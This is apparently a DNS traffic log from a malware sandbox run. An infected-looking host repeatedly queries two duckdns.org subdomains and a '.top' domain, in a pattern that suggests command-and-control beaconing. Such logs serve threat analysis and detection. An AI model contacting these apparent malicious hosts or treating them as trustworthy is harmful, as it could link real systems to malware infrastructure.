                                              May 1, 2024 18:22:10.838922977 CEST192.168.2.228.8.8.80x6989Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.492696047 CEST192.168.2.228.8.8.80x792dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.589715958 CEST192.168.2.228.8.8.80x792dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.685692072 CEST192.168.2.228.8.8.80x792dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.782565117 CEST192.168.2.228.8.8.80x792dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:12.879354954 CEST192.168.2.228.8.8.80x792dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:14.648088932 CEST192.168.2.228.8.8.80x978cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:14.744129896 CEST192.168.2.228.8.8.80x978cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:14.839586020 CEST192.168.2.228.8.8.80x978cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:14.934303045 CEST192.168.2.228.8.8.80x978cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:15.029652119 CEST192.168.2.228.8.8.80x978cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:16.825422049 CEST192.168.2.228.8.8.80xf66aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:16.921485901 CEST192.168.2.228.8.8.80xf66aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:17.016194105 CEST192.168.2.228.8.8.80xf66aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:17.111049891 CEST192.168.2.228.8.8.80xf66aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:17.207022905 CEST192.168.2.228.8.8.80xf66aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.494682074 CEST192.168.2.228.8.8.80x7a40Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.606101036 CEST192.168.2.228.8.8.80x7a40Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.700737000 CEST192.168.2.228.8.8.80x7a40Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.795528889 CEST192.168.2.228.8.8.80x7a40Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.890286922 CEST192.168.2.228.8.8.80x7a40Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:19.933764935 CEST192.168.2.228.8.8.80x6678Standard query (0)ricohltd.topA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.183161974 CEST192.168.2.228.8.8.80xc1e0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.294513941 CEST192.168.2.228.8.8.80xc1e0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.389724970 CEST192.168.2.228.8.8.80xc1e0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.484337091 CEST192.168.2.228.8.8.80xc1e0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.578669071 CEST192.168.2.228.8.8.80xc1e0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.791063070 CEST192.168.2.228.8.8.80x6f88Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.886620998 CEST192.168.2.228.8.8.80x6f88Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.981419086 CEST192.168.2.228.8.8.80x6f88Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:21.076066017 CEST192.168.2.228.8.8.80x6f88Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:21.170627117 CEST192.168.2.228.8.8.80x6f88Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.391911030 CEST192.168.2.228.8.8.80xc9e8Standard query (0)ricohltd.topA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.432672024 CEST192.168.2.228.8.8.80x123aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.527772903 CEST192.168.2.228.8.8.80x123aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.625559092 CEST192.168.2.228.8.8.80x123aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.721797943 CEST192.168.2.228.8.8.80x123aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.819361925 CEST192.168.2.228.8.8.80x123aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.024665117 CEST192.168.2.228.8.8.80xdfcfStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.132033110 CEST192.168.2.228.8.8.80xdfcfStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.231211901 CEST192.168.2.228.8.8.80xdfcfStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.333406925 CEST192.168.2.228.8.8.80xdfcfStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.496870995 CEST192.168.2.228.8.8.80xdfcfStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.421323061 CEST192.168.2.228.8.8.80x980cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.517096996 CEST192.168.2.228.8.8.80x980cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.611840010 CEST192.168.2.228.8.8.80x980cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.706909895 CEST192.168.2.228.8.8.80x980cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.908931017 CEST192.168.2.228.8.8.80x980cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.505369902 CEST192.168.2.228.8.8.80x9d71Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.600500107 CEST192.168.2.228.8.8.80x9d71Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.695513010 CEST192.168.2.228.8.8.80x9d71Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.789962053 CEST192.168.2.228.8.8.80x9d71Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.886935949 CEST192.168.2.228.8.8.80x9d71Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.998074055 CEST192.168.2.228.8.8.80x56e7Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.097315073 CEST192.168.2.228.8.8.80x56e7Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.192524910 CEST192.168.2.228.8.8.80x56e7Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.291342974 CEST192.168.2.228.8.8.80x56e7Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.387414932 CEST192.168.2.228.8.8.80x56e7Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:36.705383062 CEST192.168.2.228.8.8.80xf573Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:36.804203033 CEST192.168.2.228.8.8.80xf573Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:36.902228117 CEST192.168.2.228.8.8.80xf573Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:36.997085094 CEST192.168.2.228.8.8.80xf573Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.092837095 CEST192.168.2.228.8.8.80xf573Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.195841074 CEST192.168.2.228.8.8.80x4950Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.290626049 CEST192.168.2.228.8.8.80x4950Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.388287067 CEST192.168.2.228.8.8.80x4950Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.487287045 CEST192.168.2.228.8.8.80x4950Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.583035946 CEST192.168.2.228.8.8.80x4950Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:38.821369886 CEST192.168.2.228.8.8.80x9875Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:38.917068958 CEST192.168.2.228.8.8.80x9875Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.011676073 CEST192.168.2.228.8.8.80x9875Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.106695890 CEST192.168.2.228.8.8.80x9875Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.201545000 CEST192.168.2.228.8.8.80x9875Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.315838099 CEST192.168.2.228.8.8.80x6810Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.410470009 CEST192.168.2.228.8.8.80x6810Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.505238056 CEST192.168.2.228.8.8.80x6810Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.599957943 CEST192.168.2.228.8.8.80x6810Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.694297075 CEST192.168.2.228.8.8.80x6810Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.132133961 CEST192.168.2.228.8.8.80x769aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.226847887 CEST192.168.2.228.8.8.80x769aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.321338892 CEST192.168.2.228.8.8.80x769aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.416470051 CEST192.168.2.228.8.8.80x769aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.511637926 CEST192.168.2.228.8.8.80x769aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:41.654154062 CEST192.168.2.228.8.8.80x2b75Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:41.750489950 CEST192.168.2.228.8.8.80x2b75Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:41.846642971 CEST192.168.2.228.8.8.80x2b75Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:41.942084074 CEST192.168.2.228.8.8.80x2b75Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.037667990 CEST192.168.2.228.8.8.80x2b75Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.307491064 CEST192.168.2.228.8.8.80x4611Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.402728081 CEST192.168.2.228.8.8.80x4611Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.497925997 CEST192.168.2.228.8.8.80x4611Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.592650890 CEST192.168.2.228.8.8.80x4611Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.687736034 CEST192.168.2.228.8.8.80x4611Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.958205938 CEST192.168.2.228.8.8.80x3d6bStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.053092957 CEST192.168.2.228.8.8.80x3d6bStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.147496939 CEST192.168.2.228.8.8.80x3d6bStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.242006063 CEST192.168.2.228.8.8.80x3d6bStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.336268902 CEST192.168.2.228.8.8.80x3d6bStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.480649948 CEST192.168.2.228.8.8.80x502cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.576061010 CEST192.168.2.228.8.8.80x502cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.671076059 CEST192.168.2.228.8.8.80x502cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.769984007 CEST192.168.2.228.8.8.80x502cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.865179062 CEST192.168.2.228.8.8.80x502cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.313878059 CEST192.168.2.228.8.8.80x34f3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.408739090 CEST192.168.2.228.8.8.80x34f3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.504148960 CEST192.168.2.228.8.8.80x34f3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.601730108 CEST192.168.2.228.8.8.80x34f3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.698278904 CEST192.168.2.228.8.8.80x34f3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.845649004 CEST192.168.2.228.8.8.80xf27fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.940309048 CEST192.168.2.228.8.8.80xf27fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.035043001 CEST192.168.2.228.8.8.80xf27fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.133527994 CEST192.168.2.228.8.8.80xf27fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.229324102 CEST192.168.2.228.8.8.80xf27fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.334239006 CEST192.168.2.228.8.8.80xae8aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.449465036 CEST192.168.2.228.8.8.80xae8aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.554034948 CEST192.168.2.228.8.8.80xae8aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.649490118 CEST192.168.2.228.8.8.80xae8aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.744138002 CEST192.168.2.228.8.8.80xae8aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:48.862423897 CEST192.168.2.228.8.8.80x73faStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:48.956934929 CEST192.168.2.228.8.8.80x73faStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.051445961 CEST192.168.2.228.8.8.80x73faStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.145869970 CEST192.168.2.228.8.8.80x73faStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.243303061 CEST192.168.2.228.8.8.80x73faStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.348141909 CEST192.168.2.228.8.8.80x9affStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.447283983 CEST192.168.2.228.8.8.80x9affStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.543271065 CEST192.168.2.228.8.8.80x9affStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.643289089 CEST192.168.2.228.8.8.80x9affStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.737740993 CEST192.168.2.228.8.8.80x9affStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.842605114 CEST192.168.2.228.8.8.80xfe72Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.938218117 CEST192.168.2.228.8.8.80xfe72Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:50.033008099 CEST192.168.2.228.8.8.80xfe72Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:50.128153086 CEST192.168.2.228.8.8.80xfe72Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:50.223376036 CEST192.168.2.228.8.8.80xfe72Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.354475975 CEST192.168.2.228.8.8.80xd0c1Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.465317965 CEST192.168.2.228.8.8.80xd0c1Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.563265085 CEST192.168.2.228.8.8.80xd0c1Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.675280094 CEST192.168.2.228.8.8.80xd0c1Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.769942045 CEST192.168.2.228.8.8.80xd0c1Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.874034882 CEST192.168.2.228.8.8.80xe166Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.969374895 CEST192.168.2.228.8.8.80xe166Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.090219021 CEST192.168.2.228.8.8.80xe166Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.203027010 CEST192.168.2.228.8.8.80xe166Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.299387932 CEST192.168.2.228.8.8.80xe166Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.403633118 CEST192.168.2.228.8.8.80x1acStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.499404907 CEST192.168.2.228.8.8.80x1acStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.594396114 CEST192.168.2.228.8.8.80x1acStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.708307028 CEST192.168.2.228.8.8.80x1acStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.803129911 CEST192.168.2.228.8.8.80x1acStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:53.915472031 CEST192.168.2.228.8.8.80x3218Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.010133028 CEST192.168.2.228.8.8.80x3218Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.105259895 CEST192.168.2.228.8.8.80x3218Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.201739073 CEST192.168.2.228.8.8.80x3218Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.297254086 CEST192.168.2.228.8.8.80x3218Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.398705006 CEST192.168.2.228.8.8.80xb5aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.497287989 CEST192.168.2.228.8.8.80xb5aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.592010975 CEST192.168.2.228.8.8.80xb5aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.687288046 CEST192.168.2.228.8.8.80xb5aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.782345057 CEST192.168.2.228.8.8.80xb5aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.890232086 CEST192.168.2.228.8.8.80x41fbStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.985241890 CEST192.168.2.228.8.8.80x41fbStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:55.083326101 CEST192.168.2.228.8.8.80x41fbStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:55.183401108 CEST192.168.2.228.8.8.80x41fbStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:55.282550097 CEST192.168.2.228.8.8.80x41fbStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.397111893 CEST192.168.2.228.8.8.80xc3fdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.496565104 CEST192.168.2.228.8.8.80xc3fdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.591804981 CEST192.168.2.228.8.8.80xc3fdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.686435938 CEST192.168.2.228.8.8.80xc3fdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.783698082 CEST192.168.2.228.8.8.80xc3fdStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.888722897 CEST192.168.2.228.8.8.80x62c5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.987363100 CEST192.168.2.228.8.8.80x62c5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.104094982 CEST192.168.2.228.8.8.80x62c5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.203254938 CEST192.168.2.228.8.8.80x62c5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.297842026 CEST192.168.2.228.8.8.80x62c5Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.402113914 CEST192.168.2.228.8.8.80xb7ffStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.503211975 CEST192.168.2.228.8.8.80xb7ffStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.598020077 CEST192.168.2.228.8.8.80xb7ffStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.692734957 CEST192.168.2.228.8.8.80xb7ffStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.791253090 CEST192.168.2.228.8.8.80xb7ffStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:58.923945904 CEST192.168.2.228.8.8.80x34cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.019566059 CEST192.168.2.228.8.8.80x34cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.114733934 CEST192.168.2.228.8.8.80x34cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.221467972 CEST192.168.2.228.8.8.80x34cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.316755056 CEST192.168.2.228.8.8.80x34cbStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.435328960 CEST192.168.2.228.8.8.80xbf6fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.530088902 CEST192.168.2.228.8.8.80xbf6fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.625719070 CEST192.168.2.228.8.8.80xbf6fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.721589088 CEST192.168.2.228.8.8.80xbf6fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.819293022 CEST192.168.2.228.8.8.80xbf6fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
